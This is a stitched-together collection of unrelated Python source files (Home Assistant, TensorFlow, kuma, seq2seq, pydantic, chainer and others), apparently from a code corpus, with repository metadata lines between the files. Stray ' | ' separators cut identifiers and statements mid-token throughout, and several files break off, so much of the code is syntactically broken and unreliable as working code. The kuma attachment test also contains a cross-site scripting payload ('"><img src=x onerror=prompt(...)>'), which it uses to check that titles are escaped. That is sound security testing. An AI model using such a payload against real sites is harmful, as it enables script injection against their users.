account_settings = get_account_settings(self.default_request)[0]
self.assertEqual(account_settings['social_links'], social_links)
def test_add_social_links(self):
original_social_links = [
dict(platform="faceb |
orlade/microsimmer | host/server/transformer.py | Python | mit | 2,039 | 0.000981 | FILE_PREFIX = '__file__'
class FormTransformer(object):
"""
Deserializes requests constructed by HTML forms, and serializes results to
JSON.
"""
def parse(self, request, service_params):
"""
Parses the parameter values in the request to a list with the order of
the given service_params.
"""
# TODO(orlade): Read types from IDL.
args = []
for param in service_params:
# Check files first. Empty if no files uploaded.
file_param | = FILE_PREFIX + param
if file_param in request.files.keys():
value = self.parse_value(
request.files.get(file_param).file.read())
args.append(value)
elif param in request.params:
value = self.parse_value(request.params[param])
args.append(value)
return args
def parse_display(self, request, service_params):
"""
Parses the request arguments into a dictionary.
"""
# TODO(orlade): Deduplicate logic for rendering.
args = {}
for param in service_params:
# Check files first. Empty if no files uploaded.
file_param = FILE_PREFIX + param
if file_param in request.files.keys():
# Return the filename for display instead of the contents.
args[param] = request.files.get(file_param).filename
elif param in request.params:
args[param] = self.parse_value(request.params[param])
return args
def parse_value(self, value):
"""
Converts the given string to the appropriate Python type.
"""
try:
return int(value)
except:
try:
return float(value)
except:
pass
return value
def serialize(self, results):
"""
Converts the given Python object into a string for the client.
"""
return results
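# Editor's sketch (addition): parse_value coerces form strings to numbers
# when possible and otherwise returns them unchanged.
if __name__ == '__main__':
    t = FormTransformer()
    assert t.parse_value('3') == 3
    assert t.parse_value('2.5') == 2.5
    assert t.parse_value('abc') == 'abc'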
|
shaftoe/home-assistant | homeassistant/components/calendar/demo.py | Python | apache-2.0 | 2,739 | 0 | """
Demo platform that has two fake binary sensors.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/demo/
"""
import homeassistant.util.dt as dt_util
from homeassistant.components.calendar import CalendarEventDevice
from homeassistant.components.google import CONF_DEVICE_ID, CONF_NAME
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Demo Calendar platform."""
calendar_data_future = DemoGoogleCalendarDataFuture()
calendar_data_current = DemoGoogleCalendarDataCurrent()
add_devices([
DemoGoogleCalendar(hass, calendar_data_future, {
CONF_NAME: 'Future Event',
CONF_DEVICE_ID: 'future_event',
}),
DemoGoogleCalendar(hass, calendar_data_current, {
CONF_NAME: 'Current Event',
CONF_DEVICE_ID: 'current_event',
}),
])
class DemoGoogleCalendarData(object):
"""Representation of a Demo Calendar element."""
# pylint: disable=no-self-use
def update(self):
"""Return true so entity knows we have new data."""
return True
class DemoGoogleCalendarDataFuture(DemoGoogleCalendarData):
"""Representation of a Demo Calendar for a future event."""
def __init__(self):
"""Set the event to a future event."""
one_hour_from_now = dt_util.now() \
+ dt_util.dt.timedelta(minutes=30)
self.event = {
'start': {
'dateTime': one_hour_from_now.isoformat()
},
'end': {
'dateTime': (one_hour_from_now + dt_util.dt.
timedelta(minutes=60)).isoformat()
},
'summary': 'Future Event',
}
class DemoGoogleCalendarDataCurrent(DemoGoogleCalendarData):
"""Representation of a Demo Calendar for a current event."""
def __init__(self):
| """Set the event data."""
middle_of_event = dt_util.now() \
- dt_util.dt.timedelta(minutes=30)
self.event = {
'start': {
'dateTime': middle_of_event.isoformat()
},
'end': {
                'dateTime': (middle_of_event + dt_util.dt.
timedelta(minutes=60)).isoformat()
},
'summary': 'Current Event',
}
class DemoGoogleCalendar(CalendarEventDevice):
"""Representation of a Demo Calendar element."""
def __init__(self, hass, calendar_data, data):
"""Initialize Google Calendar but without the API calls."""
self.data = calendar_data
super().__init__(hass, data)
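# Editor's sketch (addition): the "current event" window built above, shown
# with plain datetimes; a 60-minute event that started 30 minutes ago is in
# progress right now, which is what makes the demo entity "current".
if __name__ == "__main__":
    from datetime import datetime, timedelta
    start = datetime.now() - timedelta(minutes=30)
    end = start + timedelta(minutes=60)
    assert start <= datetime.now() <= end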
|
anhstudios/swganh | data/scripts/templates/object/tangible/furniture/plain/shared_plain_coffee_table_s01.py | Python | mit | 463 | 0.047516 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/furniture/plain/shared_plain_coffee_table_s01.iff"
result.attribute_template_id = 6
result.stfName("frn_n","frn_coffee_table")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
|
	return result
tinloaf/home-assistant | tests/components/test_rest_command.py | Python | apache-2.0 | 10,394 | 0 | """The tests for the rest command platform."""
import asyncio
import aiohttp
import homeassistant.components.rest_command as rc
from homeassistant.setup import setup_component
from tests.common import (
get_test_home_assistant, assert_setup_component)
class TestRestCommandSetup:
"""Test the rest command component."""
def setup_method(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.config = {
rc.DOMAIN: {'test_get': {
'url': 'http://example.com/'
}}
}
def teardown_method(self):
"""Stop everything that was started."""
self.hass.stop()
def test_setup_component(self):
"""Test setup component."""
with assert_setup_component(1):
setup_component(self.hass, rc.DOMAIN, self.config)
def test_setup_component_timeout(self):
"""Test setup component timeout."""
self.config[rc.DOMAIN]['test_get']['timeout'] = 10
with assert_setup_component(1):
setup_component(self.hass, rc.DOMAIN, self.config)
def test_setup_component_test_service(self):
"""Test setup component and check if service exits."""
with assert_setup_component(1):
setup_component(self.hass, rc.DOMAIN, self.config)
assert self.hass.services.has_service(rc.DOMAIN, 'test_get')
class TestRestCommandComponent:
"""Test the rest command component."""
def setup_method(self):
"""Set up things to be run when tests are started."""
self.url = "https://example.com/"
self.config = {
rc.DOMAIN: {
'get_test': {
'url': self.url,
'method': 'get',
},
'post_test': {
'url': self.url,
'method': 'post',
},
'put_test': {
'url': self.url,
'method': 'put',
},
'delete_test': {
'url': self.url,
'method': 'delete',
},
}
}
self.hass = get_test_home_assistant()
def teardown_method(self):
"""Stop everything that was started."""
self.hass.stop()
def test_setup_tests(self):
"""Set up test config and test it."""
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
assert self.hass.services.has_service(rc.DOMAIN, 'get_test')
assert self.hass.services.has_service(rc.DOMAIN, 'post_test')
assert self.hass.services.has_service(rc.DOMAIN, 'put_test')
assert self.hass.services.has_service(rc.DOMAIN, 'delete_test')
def test_rest_command_timeout(self, aioclient_mock):
"""Call a rest command with timeout."""
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.get(self.url, exc=asyncio.TimeoutError())
self.hass.services.call(rc.DOMAIN, 'get_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
def test_rest_command_aiohttp_error(self, aioclient_mock):
"""Call a rest command with aiohttp exception."""
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.get(self.url, exc=aiohttp.ClientError())
self.hass.services.call(rc.DOMAIN, 'get_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
def test_rest_command_http_error(self, aioclient_mock):
"""Call a rest command with status code 400."""
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.get(self.url, status=400)
self.hass.services.call(rc.DOMAIN, 'get_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
def test_rest_command_auth(self, aioclient_mock):
"""Call a rest command with auth credential."""
data = {
'username': 'test',
'password': '123456',
}
self.config[rc.DOMAIN]['get_test'].update(data)
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.get(self.url, content=b'success')
self.hass.services.call(rc.DOMAIN, 'get_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
def test_rest_command_form_data(self, aioclient_mock):
"""Call a rest command with post form data."""
data = {
'payload': 'test'
}
self.config[rc.DOMAIN]['post_test'].update(data)
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.post(self.url, content=b'success')
self.hass.services.call(rc.DOMAIN, 'post_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
assert aioclient_mock.mock_calls[0][2] == b'test'
def test_rest_command_get(self, aioclient_mock):
"""Call a rest command with get."""
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.get(self.url, content=b'success')
self.hass.services.call(rc.DOMAIN, 'get_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
def test_rest_command_delete(self, aioclient_mock):
"""Call a rest command with delete."""
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.delete(self.url, content=b'success')
self.hass.services.call(rc.DOMAIN, 'delete_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
def test_rest_command_post(self, aioclient_mock):
"""Call a rest command | with post."""
data = {
'payload': 'data',
}
self.config[rc.DOMAIN]['post_test'].update(data)
with assert_setup_component(4):
            setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.post(self.url, content=b'success')
self.hass.services.call(rc.DOMAIN, 'post_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
assert aioclient_mock.mock_calls[0][2] == b'data'
def test_rest_command_put(self, aioclient_mock):
"""Call a rest command with put."""
data = {
'payload': 'data',
}
self.config[rc.DOMAIN]['put_test'].update(data)
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.put(self.url, content=b'success')
self.hass.services.call(rc.DOMAIN, 'put_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
assert aioclient_mock.mock_calls[0][2] == b'data'
def test_rest_command_headers(self, aioclient_mock):
"""Call a rest command with custom headers and content types."""
header_config_variations = {
rc.DOMAIN: {
'no_headers_test': {},
'content_type_test': {
'content_type': 'text/plain'
},
'headers_test': {
'headers': {
'Accept': 'application/json',
'User-Agent': 'Mozilla/5.0'
}
},
'headers_and_content_type_test': {
'headers': {
'Accept': 'application/json'
},
'content_type': 'text/plain'
},
'headers_and_content_type_override_test': {
'headers': {
'Accept': 'application/j |
gunan/tensorflow | tensorflow/python/data/kernel_tests/shuffle_test.py | Python | apache-2.0 | 13,444 | 0.006174 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset.shuffle()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
from absl.testing import parameterized
import numpy as np
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class ShuffleTest(test_base.DatasetTestBase, parameterized.TestCase):
@combinations.generate(test_base.default_test_combinations())
def testBasic(self):
components = (
np.array([1, 2, 3, 4]), np.array([5, 6, 7, 8]),
np.array([9.0, 10.0, 11.0, 12.0])
)
def dataset_fn(count=5, buffer_size=None, seed=0):
repeat_dataset = (
dataset_ops.Dataset.from_tensor_slices(components).repeat(count))
if buffer_size:
shuffle_dataset = repeat_dataset.shuffle(buffer_size, seed)
self.assertEqual(
tuple([c.shape[1:] for c in components]),
dataset_ops.get_legacy_output_shapes(shuffle_dataset))
return shuffle_dataset
else:
return repeat_dataset
# First run without shuffling to collect the "ground truth".
get_next = self.getNext(dataset_fn())
unshuffled_elements = []
for _ in range(20):
unshuffled_elements.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# Assert that the shuffled dataset has the same elements as the
# "ground truth".
get_next = self.getNext(dataset_fn(buffer_size=100, seed=37))
shuffled_elements = []
for _ in range(20):
shuffled_elements.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertAllEqual(sorted(unshuffled_elements), sorted(shuffled_elements))
# Assert that shuffling twice with the same seeds gives the same sequence.
get_next = self.getNext(dataset_fn(buffer_size=100, seed=37))
reshuffled_elements_same_seed = []
for _ in range(20):
reshuffled_elements_same_seed.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(shuffled_elements, reshuffled_elements_same_seed)
# Assert that shuffling twice with a different seed gives a different
# permutation of the same elements.
get_next = self.getNext(dataset_fn(buffer_size=100, seed=137))
reshuffled_elements_different_seed = []
for _ in range(20):
reshuffled_elements_different_seed.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertNotEqual(shuffled_elements, reshuffled_elements_different_seed)
self.assertAllEqual(
sorted(shuffled_elements), sorted(reshuffled_elements_different_seed))
# Assert that the shuffled dataset has the same elements as the
# "ground truth" when the buffer size is smaller than the input
# dataset.
get_next = self.getNext(dataset_fn(buffer_size=2, seed=37))
reshuffled_elements_small_buffer = []
for _ in range(20):
reshuffled_elements_small_buffer.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertAllEqual(
sorted(unshuffled_elements), sorted(reshuffled_elements_small_buffer))
# Test the case of shuffling an empty dataset.
get_next = self.getNext(dataset_fn(count=0, buffer_size=100, seed=37))
with self.assertRai | ses(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(combinations.combine(tf_api_version=1, mode="graph"))
def testSeedZero(self):
"""Test for same behavior when the seed is a Python or Tensor zero | ."""
iterator = dataset_ops.make_one_shot_iterator(
dataset_ops.Dataset.range(10).shuffle(10, seed=0))
get_next = iterator.get_next()
elems = []
with self.cached_session() as sess:
for _ in range(10):
elems.append(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
seed_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = dataset_ops.make_initializable_iterator(
dataset_ops.Dataset.range(10).shuffle(10, seed=seed_placeholder))
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(iterator.initializer, feed_dict={seed_placeholder: 0})
for elem in elems:
self.assertEqual(elem, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
@combinations.generate(test_base.default_test_combinations())
def testDefaultArguments(self):
components = [0, 1, 2, 3, 4]
dataset = dataset_ops.Dataset.from_tensor_slices(components).shuffle(
5).repeat()
get_next = self.getNext(dataset)
counts = collections.defaultdict(lambda: 0)
for _ in range(10):
for _ in range(5):
counts[self.evaluate(get_next())] += 1
for i in range(5):
self.assertEqual(10, counts[i])
@combinations.generate(
combinations.times(
test_base.graph_only_combinations(),
combinations.combine(reshuffle=[True, False]),
combinations.combine(graph_seed=38, op_seed=None) +
combinations.combine(graph_seed=None, op_seed=42) +
combinations.combine(graph_seed=38, op_seed=42)))
def testShuffleSeed(self, reshuffle, graph_seed, op_seed):
results = []
for _ in range(2):
with ops.Graph().as_default() as g:
random_seed.set_random_seed(graph_seed)
dataset = dataset_ops.Dataset.range(10).shuffle(
10, seed=op_seed, reshuffle_each_iteration=reshuffle).repeat(3)
iterator = dataset_ops.make_one_shot_iterator(dataset)
next_element = iterator.get_next()
run_results = []
with self.session(graph=g) as sess:
for _ in range(30):
run_results.append(sess.run(next_element))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_element)
results.append(run_results)
self.assertAllEqual(results[0], results[1])
# TODO(b/117581999): enable this test for eager-mode.
@combinations.generate(
combinations.times(
test_base.graph_only_combinations(),
combinations.combine(
reshuffle=[True, False], initializable=[True, False])))
def testMultipleIterators(self, reshuffle, initializable):
with ops.Graph().as_default() as g:
dataset = dataset_ops.Dataset.range(100).shuffle(
10, reshuffle_each_iteration=reshuffle).repeat(3)
if initializable:
iterators = [dataset_ops.make_initializable_iterator(dataset)
for _ in range(2)]
else:
iterators = [dataset_ops.make_one_shot_iterator(dataset)
fo |
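# The seed tests above pin down the `Dataset.shuffle()` contract: the same
# (graph seed, op seed) pair reproduces the same order, and
# `reshuffle_each_iteration=False` freezes the permutation across epochs.
# A minimal eager-mode sketch of that contract (assumes TF 2.x is
# installed; this is not part of the test file above):
import tensorflow as tf
tf.random.set_seed(38)  # plays the role of graph_seed above
ds = tf.data.Dataset.range(10).shuffle(10, seed=42,
                                       reshuffle_each_iteration=False)
first_epoch = [int(x) for x in ds]
second_epoch = [int(x) for x in ds]
assert first_epoch == second_epoch              # permutation is reused
assert sorted(first_epoch) == list(range(10))   # still a permutation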
mastizada/kuma | kuma/attachments/tests/test_templates.py | Python | mpl-2.0 | 2,137 | 0.001404 | from nose.plugins.attrib import attr
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
import constance.config
from django.conf import settings
from kuma.users.tests import UserTestCase
from kuma.wiki.tests import revision, WikiTestCase
from kuma.core.urlresolvers import reverse
from ..models import Attachment
from ..utils import make_test_file
class AttachmentTests(UserTestCase, WikiTestCase):
def setUp(self):
super(AttachmentTests, self).setUp()
self.old_allowed_types = constance.config.WIKI_ATTACHMENT_ALLOWED_TYPES
constance.config.WIKI_ATTACHMENT_ALLOWED_TYPES = 'text/plain'
def tearDown(self):
super(AttachmentTests, self).tearDown()
constance.config.WIKI_ATTACHMENT_ALLOWED_TYPES = self.old_allowed_types
@attr('security')
def test_xss_file_attachment_titl | e(self):
title = '"><img src=x onerror=prompt(navigator.userAgent);>'
# use view to create new attachment
file_for_uplo | ad = make_test_file()
post_data = {
'title': title,
'description': 'xss',
'comment': 'xss',
'file': file_for_upload,
}
self.client.login(username='admin', password='testpass')
resp = self.client.post(reverse('attachments.new_attachment'),
data=post_data)
eq_(302, resp.status_code)
# now stick it in/on a document
attachment = Attachment.objects.get(title=title)
rev = revision(content='<img src="%s" />' % attachment.get_file_url(),
save=True)
# view it and verify markup is escaped
response = self.client.get(reverse('wiki.edit_document', args=(rev.slug,),
locale=settings.WIKI_DEFAULT_LANGUAGE))
eq_(200, response.status_code)
doc = pq(response.content)
eq_('%s xss' % title,
doc('#page-attachments-table .attachment-name-cell').text())
ok_('><img src=x onerror=prompt(navigator.userAgent);>' in
doc('#page-attachments-table .attachment-name-cell').html())
|
eske/seq2seq | translate/utils.py | Python | apache-2.0 | 20,579 | 0.002478 | import os
import sys
import re
import numpy as np
import logging
import struct
import random
import math
import wave
import shutil
import collections
import functools
import operator
import heapq
from collections import namedtuple
from contextlib import contextmanager
# special vocabulary symbols
_BOS = '<S>'
_EOS = '</S>'
_UNK = '<UNK>'
_KEEP = '<KEEP>'
_DEL = '<DEL>'
_INS = '<INS>'
_SUB = '<SUB>'
_NONE = '<NONE>'
_START_VOCAB = [_BOS, _EOS, _UNK, _KEEP, _DEL, _INS, _SUB, _NONE]
BOS_ID = 0
EOS_ID = 1
UNK_ID = 2
KEEP_ID = 3
DEL_ID = 4
INS_ID = 5
SUB_ID = 6
NONE_ID = 7
class FinishedTrainingException(Exception):
def __init__(self):
debug('finished training')
class CheckpointException(Exception):
pass
class EvalException(Exception):
pass
@contextmanager
def open_files(names, mode='r'):
""" Safely open a list of files in a context manager.
Example:
>>> with open_files(['foo.txt', 'bar.csv']) as (f1, f2):
... pass
"""
files = []
try:
for name_ in names:
if name_ is None:
file_ = sys.stdin if 'r' in mode else sys.stdout
else:
file_ = open(name_, mode=mode)
files.appen | d(file_)
yield files
finally:
for file_ in files:
file_.close()
class AttrDict(dict):
"""
Dictionary whose keys can be accessed as attributes.
Example:
>>> d = AttrDict(x=1, y=2)
>>> d.x
1
>>> d.y = 3
"""
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self # dark magic
def __getattr__(self, item):
return self._ | _dict__.get(item)
def reverse_edits(source, edits, fix=True, strict=False):
if len(edits) == 1: # transform list of edits as a list of (op, word) tuples
edits = edits[0]
for i, edit in enumerate(edits):
if edit in (_KEEP, _DEL, _INS, _SUB):
edit = (edit, edit)
elif edit.startswith(_INS + '_'):
edit = (_INS, edit[len(_INS + '_'):])
elif edit.startswith(_SUB + '_'):
edit = (_SUB, edit[len(_SUB + '_'):])
else:
edit = (_INS, edit)
edits[i] = edit
else:
edits = zip(*edits)
src_words = source
target = []
consistent = True
i = 0
for op, word in edits:
if strict and not consistent:
break
if op in (_DEL, _KEEP, _SUB):
if i >= len(src_words):
consistent = False
continue
if op == _KEEP:
target.append(src_words[i])
elif op == _SUB:
target.append(word)
i += 1
else: # op is INS
target.append(word)
if fix:
target += src_words[i:]
return target
def initialize_vocabulary(vocabulary_path):
"""
Initialize vocabulary from file.
We assume the vocabulary is stored one-item-per-line, so a file:
dog
cat
will result in a vocabulary {'dog': 0, 'cat': 1}, and a reversed vocabulary ['dog', 'cat'].
:param vocabulary_path: path to the file containing the vocabulary.
:return:
the vocabulary (a dictionary mapping string to integers), and
the reversed vocabulary (a list, which reverses the vocabulary mapping).
"""
if os.path.exists(vocabulary_path):
rev_vocab = []
with open(vocabulary_path) as f:
rev_vocab.extend(f.readlines())
rev_vocab = [line.rstrip('\n') for line in rev_vocab]
vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])
return namedtuple('vocab', 'vocab reverse')(vocab, rev_vocab)
else:
raise ValueError("vocabulary file %s not found", vocabulary_path)
def sentence_to_token_ids(sentence, vocabulary, character_level=False):
"""
Convert a string to list of integers representing token-ids.
For example, a sentence "I have a dog" may become tokenized into
["I", "have", "a", "dog"] and with vocabulary {"I": 1, "have": 2,
"a": 4, "dog": 7"} this function will return [1, 2, 4, 7].
:param sentence: a string, the sentence to convert to token-ids
:param vocabulary: a dictionary mapping tokens to integers
:param character_level: treat sentence as a string of characters, and
not as a string of words
:return: a list of integers, the token-ids for the sentence.
"""
sentence = sentence.rstrip('\n') if character_level else sentence.split()
return [vocabulary.get(w, UNK_ID) for w in sentence]
def get_filenames(data_dir, model_dir, extensions, train_prefix, dev_prefix, vocab_prefix, name=None,
ref_ext=None, binary=None, decode=None, eval=None, align=None, **kwargs):
"""
Get a bunch of file prefixes and extensions, and output the list of filenames to be used
by the model.
:param data_dir: directory where all the the data is stored
:param extensions: list of file extensions, in the right order (last extension is always the target)
:param train_prefix: name of the training corpus (usually 'train')
:param dev_prefix: name of the dev corpus (usually 'dev')
:param vocab_prefix: prefix of the vocab files (usually 'vocab')
:param kwargs: optional contains an additional 'decode', 'eval' or 'align' parameter
:return: namedtuple containing the filenames
"""
train_path = os.path.join(data_dir, train_prefix)
dev_path = [os.path.join(data_dir, prefix) for prefix in dev_prefix]
train = ['{}.{}'.format(train_path, ext) for ext in extensions]
dev_extensions = list(extensions)
if ref_ext is not None and ref_ext != extensions[-1]:
dev_extensions.append(ref_ext)
dev = [['{}.{}'.format(path, ext) for ext in dev_extensions] for path in dev_path]
vocab_path = os.path.join(data_dir, vocab_prefix)
vocab_src = ['{}.{}'.format(vocab_path, ext) for ext in extensions]
data = 'data' if name is None else 'data_{}'.format(name)
vocab_path = os.path.join(model_dir, data, 'vocab')
vocab = ['{}.{}'.format(vocab_path, ext) for ext in extensions]
os.makedirs(os.path.dirname(vocab_path), exist_ok=True)
binary = binary or [False] * len(vocab)
for src, dest, binary_ in zip(vocab_src, vocab, binary):
if not binary_ and not os.path.exists(dest):
debug('copying vocab to {}'.format(dest))
shutil.copy(src, dest)
exts = list(extensions)
if decode is not None: # empty list means we decode from standard input
test = decode
exts.pop(-1)
elif eval is not None:
if ref_ext is not None:
exts[-1] = ref_ext
test = eval or dev_prefix[:1]
else:
test = align or dev_prefix[:1]
if len(test) == 1 and not (decode and os.path.exists(test[0])):
corpus_path = os.path.join(data_dir, test[0]) if not os.path.dirname(test[0]) else test[0]
test = ['{}.{}'.format(corpus_path, ext) for ext in exts]
filenames = namedtuple('filenames', ['train', 'dev', 'test', 'vocab'])
return filenames(train, dev, test, vocab)
def read_dataset(paths, extensions, vocabs, max_size=None, character_level=None, sort_by_length=False,
max_seq_len=None, from_position=None, binary=None):
data_set = []
if from_position is not None:
debug('reading from position: {}'.format(from_position))
line_reader = read_lines_from_position(paths, from_position=from_position, binary=binary)
character_level = character_level or {}
positions = None
for inputs, positions in line_reader:
if len(data_set) > 0 and len(data_set) % 100000 == 0:
debug(" lines read: {}".format(len(data_set)))
lines = [
input_ if binary_ else
sentence_to_token_ids(input_, vocab.vocab, character_level=character_level.get(ext))
for input_, vocab, binary_, ext in zip(inputs, vocabs, binary, extensions)
]
if not all(lines): # skip empty inputs
continue
# skip lines that are too long
if ma |
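# `reverse_edits()` above rebuilds a target sentence from a source sentence
# plus a stream of edit operations. A self-contained sketch of the same
# idea, using plain (op, word) tuples instead of the module's tagged
# strings (illustrative only, not the exact format the model emits):
def apply_edits(source, edits):
    target, i = [], 0
    for op, word in edits:
        if op == 'KEEP':            # copy the source word and advance
            target.append(source[i])
            i += 1
        elif op == 'DEL':           # skip the source word
            i += 1
        elif op == 'SUB':           # replace the source word and advance
            target.append(word)
            i += 1
        else:                       # 'INS': emit word without advancing
            target.append(word)
    return target + source[i:]      # like fix=True above
assert apply_edits(['the', 'cat', 'sat'],
                   [('KEEP', None), ('SUB', 'dog'), ('INS', 'never'),
                    ('KEEP', None)]) == ['the', 'dog', 'never', 'sat']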
collective/collective.z3cform.bootstrap | collective/z3cform/bootstrap/utils.py | Python | gpl-3.0 | 407 | 0 | from zope.interface import alsoProvides
from collective.z3cform.bootstrap.interfaces import IBootstrapLayer
def set_bootstrap_layer(request):
"""Set the IBootstrapLayer on the request. Useful if you don't want to
enable the bootstrap layer for your w | hole site. | """
alsoProvides(request, IBootstrapLayer)
def before_traversal_event_handler(obj, event):
set_bootstrap_layer(event.request)
|
samuelcolvin/pydantic | docs/examples/settings_add_custom_source.py | Python | mit | 978 | 0 | import json
from pathlib import Path
from typing import Dict, Any
from pydantic import BaseSettings
def json_config_settings_source(settings: BaseSettings) -> Dict[str, Any]:
"""
A simple settings source that loads variables from a JSON file
at the project's root.
Here we happen to choose to use the `env_file_encoding` from Config
when reading `config.json`
"""
encoding = settings.__config__.env_file_encoding
return json.loads(Path('config.json').read_text(encoding))
class Se | ttings(BaseSettings):
foobar: str
class Config:
env_file_encoding = 'utf-8'
@classmethod
def customise_sources(
cls,
init_settings,
env_settings,
file_secret_settings,
):
return (
init_settings,
j | son_config_settings_source,
env_settings,
file_secret_settings,
)
print(Settings())
|
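# A quick check of the priority implied by the tuple returned from
# `customise_sources` above: earlier sources win, so an `__init__` kwarg
# beats `config.json`, which in turn beats an environment variable.
# (Sketch extending the `Settings` example above; it writes a throwaway
# config.json into the working directory.)
import os
from pathlib import Path
Path('config.json').write_text('{"foobar": "from json"}', encoding='utf-8')
os.environ['FOOBAR'] = 'from env'
print(Settings())                    # foobar='from json'
print(Settings(foobar='from init'))  # foobar='from init'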
masia02/chainer | chainer/functions/clipped_relu.py | Python | mit | 1,841 | 0.002173 | from chainer import cuda
from chainer import function
from chainer import utils
from chainer.utils import type_check
import numpy
class ClippedReLU(function.Function):
"""Clipped Rectifier Unit function.
Clipped ReLU is written as :math:`ClippedReLU(x, z) = \min(\max(0, x), z)`,
where :math:`z(>0)` is a parameter to cap return value of ReLU.
"""
def __init__(self, z):
if not isinstance(z, float):
            raise TypeError('z must be a float value')
# z must be positive.
assert z > 0
self.cap = z
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 1)
x | _type, = in_types
type_check.expect(x_type.dtype == numpy.float32)
def forward_cpu(self, x):
return utils.force_array(numpy.minimum(
numpy.maximum(0, x[0]), self.cap)).astype(numpy.float32),
def backward_cpu(self, x, gy):
return utils.force_array(
gy[0] * (0 < x[0]) * (x[0] < self.cap)).astype(nump | y.float32),
def forward_gpu(self, x):
return cuda.elementwise(
'T x, T cap', 'T y', 'y = min(max(x, (T)0), cap)',
'clipped_relu_fwd')(x[0], self.cap),
def backward_gpu(self, x, gy):
gx = cuda.elementwise(
'T x, T gy, T z', 'T gx',
'gx = ((x > 0) and (x < z))? gy : 0',
'clipped_relu_bwd')(x[0], gy[0], self.cap)
return gx,
def clipped_relu(x, z=20.0):
"""Clipped Rectifier Unit function.
This function is expressed as :math:`ClippedReLU(x, z)
= \min(\max(0, x), z)`, where :math:`z(>0)` is a clipping value.
Args:
x (~chainer.Variable): Input variable.
z (float): Clipping value. (default = 20.0)
Returns:
~chainer.Variable: Output variable.
"""
return ClippedReLU(z)(x)
|
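# The forward/backward pair above is elementwise clipping plus a gradient
# mask. A dependency-light NumPy sketch of the same math (illustrative,
# not the chainer API):
import numpy as np
def clipped_relu_fwd(x, z=20.0):
    return np.minimum(np.maximum(x, 0.0), z)
def clipped_relu_bwd(x, gy, z=20.0):
    # the gradient passes through only on the linear segment 0 < x < z
    return gy * ((x > 0) & (x < z))
x = np.array([-1.0, 0.5, 25.0])
print(clipped_relu_fwd(x))                   # [ 0.   0.5 20. ]
print(clipped_relu_bwd(x, np.ones_like(x)))  # [0. 1. 0.]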
Fireblend/scikit-learn | sklearn/linear_model/base.py | Python | bsd-3-clause | 16,019 | 0.000499 | """
Generalized Linear models.
"""
# Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Fabian Pedregosa <fabian.pedregosa@inria.fr>
# Olivier Grisel <olivier.grisel@ensta.org>
# Vincent Michel <vincent.michel@inria.fr>
# Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Mathieu Blondel <mathieu@mblondel.org>
